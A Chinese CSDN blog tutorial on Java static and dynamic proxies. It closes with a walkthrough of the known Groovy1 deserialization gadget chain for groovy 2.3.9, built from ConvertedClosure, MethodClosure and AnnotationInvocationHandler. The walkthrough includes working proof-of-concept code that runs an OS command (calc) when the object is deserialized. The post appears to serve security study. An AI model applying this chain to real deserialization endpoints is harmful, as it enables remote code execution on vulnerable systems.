JAVA静态代理和动态代理

最新推荐文章于 2024-08-22 11:44:46 发布
最新推荐文章于 2024-08-22 11:44:46 发布
阅读量725 收藏 12
点赞数 28
分类专栏: Java安全 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GalaxySpaceX/article/details/140716874
版权

前言:

静态代理:

  • 静态代理是在编译时就已经确定了代理类的具体实现。
  • 代理类需要实现与目标类相同的接口,并且持有目标对象的引用。
  • 在代理类中实现对目标方法的增强或修改。
  • 静态代理的优点是实现简单,可以很好地控制目标对象的行为。缺点是每个目标对象都需要创建一个代理类,造成代码冗余。

动态代理:

  • 动态代理是在运行时动态生成代理类的实现。
  • 动态代理不需要事先知道目标类的具体实现,而是通过反射机制在运行时动态生成代理类。
  • 动态代理需要实现 InvocationHandler 接口,在 invoke() 方法中实现对目标方法的增强或修改。
  • 动态代理的优点是实现灵活,可以针对不同的目标对象生成代理类,减少了代码冗余。缺点是实现相对复杂,需要一定的反射知识。

上面是针对静态代理和动态代理的基本概念,下面我们分别进行讲解

静态代理:

静态代理流程也很简单,首先要创建接口,然后实现接口,最后调用接口实现功能即可,这里编写了测试代码,首先创建接口:

package org.example.ProxyStatic;

interface Subject {
    public void run();
}

然后编写代码实现接口run:

package org.example.ProxyStatic;

public class StaticRealSubject implements Subject {

    @Override
    public void run() {
        System.out.println("RealSubject run");
    }
}

编写代码实现接口run,内部嵌套实现上面的run接口:

package org.example.ProxyStatic;


public class StaticProxy implements Subject {
    private StaticRealSubject staticRealSubject;

    public StaticProxy(StaticRealSubject staticRealSubject) {
        this.staticRealSubject = staticRealSubject;
    }

    @Override
    public void run() {
        System.out.println("myProxy doing something before...");
        staticRealSubject.run();
        System.out.println("myProxy doing something after...");
    }
}

 调用函数:

    public void mymainStatic(){
        StaticRealSubject staticRealSubject = new StaticRealSubject();
        StaticProxy proxy = new StaticProxy(staticRealSubject);
        proxy.run();
    }

执行完成后会依次输出内容:

可以看到静态代理本质上还是需要实例化对象后执行。

动态代理:

动态代理主要通过InvocationHandler(接口)和Proxy(类),下面我们先对两个进行介绍:

InvocationHandler:

InvocationHandler接口是proxy代理实例的调用处理程序实现的一个接口,每一个proxy代理实例都有一个关联的调用处理程序;在代理实例调用方法时,方法调用被编码分派到调用处理程序的invoke方法,每一个动态代理类的调用处理程序都必须实现InvocationHandler接口,并且每个代理类的实例都关联到了实现该接口的动态代理类调用处理程序中,当我们通过动态代理对象调用一个方法时候,这个方法的调用就会被转发到实现InvocationHandler接口类的invoke方法来调用

 Proxy(类):

Proxy类就是用来创建一个代理对象的类,它提供了很多方法,但是我们最常用的是newProxyInstance方法。

public static Object newProxyInstance(ClassLoader loader, Class<?>[] interfaces, InvocationHandler h)

这个方法的作用就是创建一个代理类对象,它接收三个参数,我们来看下几个参数的含义:

  1. ClassLoader :一个Classloader对象,定义了由哪个classloader对象来加载生成的代理类
  2. Class<?>[]:一个接口对象数组,表示我们将要给我们的代理对象提供一组什么样的接口,相当于代理类实现了这些接口,代理类就可以调用接口中声明的所有方法。
  3. InvocationHandler :一个InvocationHandler对象,表示的是当动态代理对象(需要执行代理方法的类)调用方法的时候会关联到哪一个InvocationHandler对象上,并最终由这个InvocationHandler对象调用。

测试: 

为了更好的理解,下面我们进行实践:

 首先创建接口:

package org.example.ProxyDynamic;

public interface Subject {
    void doSomething();
    void doRun();
}

 然后实现接口的方法:

package org.example.ProxyDynamic;

public class DynamicRealSubject implements Subject{
    @Override
    public void doSomething() {
        System.out.println("RealSubject doing something...");
    }

    @Override
    public void doRun() {
        System.out.println("RealSubject doing doRun...");
    }

}

 最后通过关键字implements实现InvocationHandler的invoke接口:

package org.example.ProxyDynamic;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class DynamicProxy implements InvocationHandler {
    private Object target;

    public DynamicProxy(Object target) {
        this.target = target;
    }

    @Override
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        System.out.println("Proxy doing something before...");
        Object result = method.invoke(this.target, args);
        System.out.println("Proxy doing something after...");
        return result;
    }
}

对应的调用方法如下:

    public void myMainDynamic(){
        // 使用
        DynamicRealSubject dynamicRealSubject = new DynamicRealSubject();
        Subject proxy = (Subject) Proxy.newProxyInstance(
                DynamicRealSubject.class.getClassLoader(),
                new Class[]{Subject.class},
                new DynamicProxy(dynamicRealSubject)
        );
         proxy.doRun();
    }

 上述代码调用Proxy.newProxyInstance实现了动态代理,其中第一个参数无需太多关注,第二个参数为一个接口对象数组,对应的就是返回的方法中提供了哪些接口方法可以被调用,最后一个参数就是我们需要去调用的动态方法。

整体流程就是我们需要第二个参数返回一个对象数组,我们这里为new Class[]{Subject.class},则我们可以调用Subject的接口doRun,然后会去执行DynamicProxy类下的invoke来实现具体的逻辑。

执行结果如下:

下面我们针对Proxy.newProxyInstance做个测试,测试代码如下:

    public void TestProxy(){
        ClassLoader classLoader = Map.class.getClassLoader();
        Class classmy = Map.class;
        StaticRealSubject staticRealSubject = new StaticRealSubject();
        DynamicRealSubject dynamicRealSubject = new DynamicRealSubject();
        Class<?>[] allIfaces = new Class[]{Subject.class};
        Subject proxy = (Subject) Proxy.newProxyInstance(
                BeanComparator.class.getClassLoader(),
                allIfaces,
                new DynamicProxy(dynamicRealSubject)
                );
        proxy.doRun();

        System.out.printf("===================\n");
        HashMap hashMap = new HashMap();
        hashMap.put("aa","1111");
        allIfaces = new Class[]{Map.class};
        Map proxy2 = (Map) Proxy.newProxyInstance(
                BeanComparator.class.getClassLoader(),
                allIfaces,
                new DynamicProxy(hashMap)
        );
        HashMap aa = (HashMap) proxy2.put("cc","222");
    }

首先我们修改了第一个参数为BeanComparator.class.getClassLoader(),看是否会有影响,第二个我们希望实现动态代理Map看能否实现:

首先看第一处的结果:

可以看到可以正常返回,结合代码分析,此处只要是Classloader即可,只要其为接口即可,并不会对执行有影响。

第二个我们执行后可以看到,成功通过动态代理调用了Map的put方法:

为什么要研究这些,因为我们可以利用动态代理的这些特性来构建我们的攻击链

利用:

这里我们针对org.codehaus.groovy:groovy:2.3.9的Groovy1进行讲解,首先编写测试代码如下:

    public static void TestCreateProxy() throws Exception{
        try{
            //class org.codehaus.groovy.runtime.MethodClosure
            //java.lang.Runtime
            final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("calc", "execute"), "entrySet");
            Class<?>[] interfaces = Map.class.getInterfaces();
            final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, interfaces.length+1 );
            allIfaces[ 0 ] = Map.class;
            if ( interfaces.length > 0 ) {
                System.arraycopy(interfaces, 0, allIfaces, 1, interfaces.length);
            }

            Object object = Proxy.newProxyInstance(Main.class.getClassLoader(), allIfaces, closure);

            final Map map = Map.class.cast(object);
            //Class class1 = sun.reflect.annotation.AnnotationInvocationHandler
            final InvocationHandler handler = (InvocationHandler) ysoserial_reflect.getFirstCtor("sun.reflect.annotation.AnnotationInvocationHandler").newInstance(Override.class, map);

            ByteArrayOutputStream buf = new ByteArrayOutputStream();
            ObjectOutputStream objOut = new ObjectOutputStream(buf);
            objOut.writeObject(handler);

            ByteArrayInputStream btin = new ByteArrayInputStream(buf.toByteArray());
            ObjectInputStream objIn = new ObjectInputStream(btin);
            objIn.readObject();

        }catch (Exception e) {
            e.printStackTrace();
            System.out.print(e);
        }
    }

其具体的调用链如下: 

大概分析下具体流程:

(InvocationHandler) ysoserial_reflect.getFirstCtor("sun.reflect.annotation.AnnotationInvocationHandler").newInstance(Override.class, map);

上述代码执行执行完成后会设置this.memberValues,即:

this.type=Override.class
this.memberValues = map

反序列化的时候执行sun.reflect.annotation.AnnotationInvocationHandler的readObject方法:

这里需要注意虽然我们的 this.memberValues是map类型,但是代码中可以看到为代理的closure方法:

Object object = Proxy.newProxyInstance(Object.class.getClassLoader(), allIfaces, closure);
final Map map = Map.class.cast(object);

所以当执行到AnnotationInvocationHandler的如下代码的时候就会进入到ConvertedClosure的invokeCustom方法中,而不是执行map.entrySet

 for (Map.Entry<String, Object> memberValue : streamVals.entrySet())

当我们执行 streamVals.entrySet(),进入到如下代码:

这里就是为什么我们需要设置methodName为 entrySet,而不是其他,当执行streamVals.*的时候都会到invokeCustom方法中执行,但是为了调用call,而不是前面的NULL,我们必须使this.methodName和method.getName相同,因此必须设置为entrySet

最后就是通过调用Groovy执行命令,类似如下代码可以弹出计算器:

MethodClosure mc = new MethodClosure("calc", "execute");
mc.call();

利用this.getDelegate()).call(args)可以执行mc.call(null),进而成功利用Groovy执行命令

总结:

通过动态代理Proxy.newProxyInstance我们可以构建很多的攻击链,需要注意的就是对应的参数,参数二为要返回的接口类型,参数三为我们动态代理的类,需要继承InvocationHandler

当代码动态加载接口的时候会自动进入代理对象的invoke方法执行,所以无需关注其动态代理调用的是什么方法,除非进入invoke方法后有验证,否则只要调用动态类,就会进入invoke方法执行逻辑。

因此我们在构建攻击链的时候需要注意我们需要构建的动态代理是否会在readObject中被调用,调用后invoke方法中是否会触发我们的恶意代码,如果满足上述条件就是一个合格的攻击链。

GalaxySpaceX
关注
专栏目录
Java静态代理动态代理
05-28
代理模式分为两种主要类型:静态代理动态代理。 **静态代理** 静态代理是通过程序员手动创建一个代理类来实现的。这个代理类实现了与目标类相同的接口,并且在调用目标方法时添加额外的逻辑。以下是一个简单的...
java 动态代理静态代理
shaofei_huai的博客
07-26 1542
代理在生活中比较常见,比如常见的代理商,对工厂进行代理,工厂专注生产,代理商负责经销,用户购买商品从代理商手中购买。java中代理分为动态代理静态代理,其中动态代理比较常见的有jdk动态代理和cglib动态代理静态代理 静态代理实现简单,但不够灵活,比较麻烦,要实现与被代理对象一样的接口,创建很多代理类。接口增加方法后代理类与被代理对象都要加方法。以日志代理举例: 1.创建订单接口 /** * 订单接口 * * @author huai...
Java设计模式之代理模式:静态代理VS动态代理,与其他模式的对比分析和案例解析
最新发布
J老熊
08-22 822
代理模式(Proxy Pattern)是一种结构型设计模式,它提供了一个代理对象,用来控制对另一个对象的访问。这种模式通常用于在访问对象时引入额外的功能,而不改变对象的接口。代理模式的核心思想是为其他对象提供一种代理,以控制对这个对象的访问。在现实生活中,代理模式的典型例子是房屋中介。购房者并不会直接联系房主,而是通过中介进行房屋的购买,这个中介相当于代理。代理模式在 Java 开发中是一个非常实用的模式,尤其是在权限控制、日志记录、性能优化等方面。
Java 静态代理动态代理
涂涂写写的笔记
10-31 869
静态代理动态代理
Java中的静态代理动态代理
weixin_34122810的博客
02-24 136
什么是代理 代理是设计模式的一种,代理类为委托类提供消息预处理,消息转发,事后消息处理等功能。Java中的代理分为三种角色: 代理类(ProxySubject) 委托类(RealSubject) 接口(Subject) 三者关系可以表示如下图: Java中的代理按照代理类生成时机不同又分为静态代理动态代理静态代理代理类在编译期就生成,而动态代理代理类则是在Java运行时动态生...
java静态代理动态代理
weixin_43919497的博客
10-23 342
文章目录一、静态代理例子二、动态代理1. JDK动态代理 参考:Java 动态代理详解 一、静态代理 实现静态代理分三步: 主题抽象类或者接口 真实对象实现接口方法 代理对象实现接口,代理主题 例子 假设要对一个service进行前后通知,先创建UserService主题接口 编写UserService主题 package com.yzx.proxy; public interface UserService { void select(); void update(); }
java静态代理动态代理详解
10-16
Java中,代理主要分为静态代理动态代理。 1. 静态代理静态代理是在编译时就已经明确代理类与被代理类关系的一种方式。为了实现静态代理,我们需要手动创建一个代理类,这个代理类通常会实现与被代理类相同的...
Java设计模式——代理设计模式(静态代理动态代理
04-15
代理设计模式分为静态代理动态代理两种类型。 ### 静态代理 静态代理是在编译时就已经确定了代理关系,代理类和真实类的关系是硬编码在代理类中的。下面我们将详细介绍静态代理的实现方式: 1. **定义接口**:...
Java静态代理动态代理
了解➔熟悉➔掌握➔精通
12-28 277
分享一个大牛的人工智能教程。零基础!通俗易懂!风趣幽默!希望你也加入到人工智能的队伍中来!请轻击http://www.captainbed.net Java静态代理 代理对象和目标对象实现了相同的接口,目标对象作为代理对象的一个属性,具体接口实现中,代理对象可以在调用目标对象相应方法前后加上其他业务处理逻辑。 我们写一个代理类,在代理类里面有一个被代理的类,他是代理对象的私有变量,调用具体代理对象的方法的时候,内部的实现是真实的类的方法的实现。可以再写上pre、 post之类的执行前后的其他逻辑。 缺点:
Java 动态代理静态代理 详解(结合代码实列)
怀着一颗学徒的心
07-18 611
从输出结果可以看出,静态代理动态代理都在原始对象的方法调用前后添加了额外的处理逻辑。但是,静态代理需要提前手动编写代理类,而动态代理则是在运行时生成代理对象。静态代理在编写和使用上更为直观,但是当需要代理多个类或接口时,需要为每个类或接口编写特定的代理类,有一定的重复工作。而动态代理可以更加灵活地决定代理哪些类或接口,并且减少了代码的重复性。总的来说,静态代理适用于代理对象较少且不需要动态决定代理关系的情况,而动态代理更适用于需要代理多个类或接口,并且希望在运行时动态决定代理关系的情况。
java 动态代理静态代理
u011192622的博客
02-25 254
什么是代理模式? 通过代理控制对象的访问,可以详细访问对象的某个方法,在这个方法调用前处理,调用后处理。 这也是 spring Aop的微实现。 代理模式的应用场景 spring Aop 、事务原理、日志打印、权限控制、远程调用…… 代理的分类 静态代理开发者或者工具类生成代理类的源码,再编译代理类。所谓的静态代理就是在程序运行之前 就已经存在代理类的字节码文件,代理类和委托类在程序运行前就已经确定了关系 动态代理 代理对象,不需要实现接口 代理类的生成,是利用JDK的api,动态的在内存中构建
java动态代理静态代理
qq_41782550的博客
08-13 99
代理模式 为其他对象提供一个代理以控制对某个对象的访问。代理类主要负责为委托了(真实对象)预处理消息、过滤消息、传递消息给委托类,代理类不现实具体服务,而是利用委托类来完成服务,并将执行结果封装处理。 其实就是代理类为被代理类预处理消息、过滤消息并在此之后将消息转发给被代理类,之后还能进行消息的后置处理。代理类和被代理类通常会存在关联关系(即上面提到的持有的被带离对象的引用),代理类本身不实现服务,而是通过调用被代理类中的方法来提供服务。 静态代理 创建一个接口,然后创建被代理的类实现该接口并且实现该接口中
Java-静态代理动态代理
上善若水
04-02 166
大家比较熟悉了Java中的代理模式。而代理模式可以分为静态代理动态代理,下面我们通过Demo来具体分析下静态代理动态代理。 我们先实现一个计算器接口类和实现类,具体代码如下: 计算器接口类 public interface Calculator { public int add(int x,int y); } 实现类 public class CalculatorImpl ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值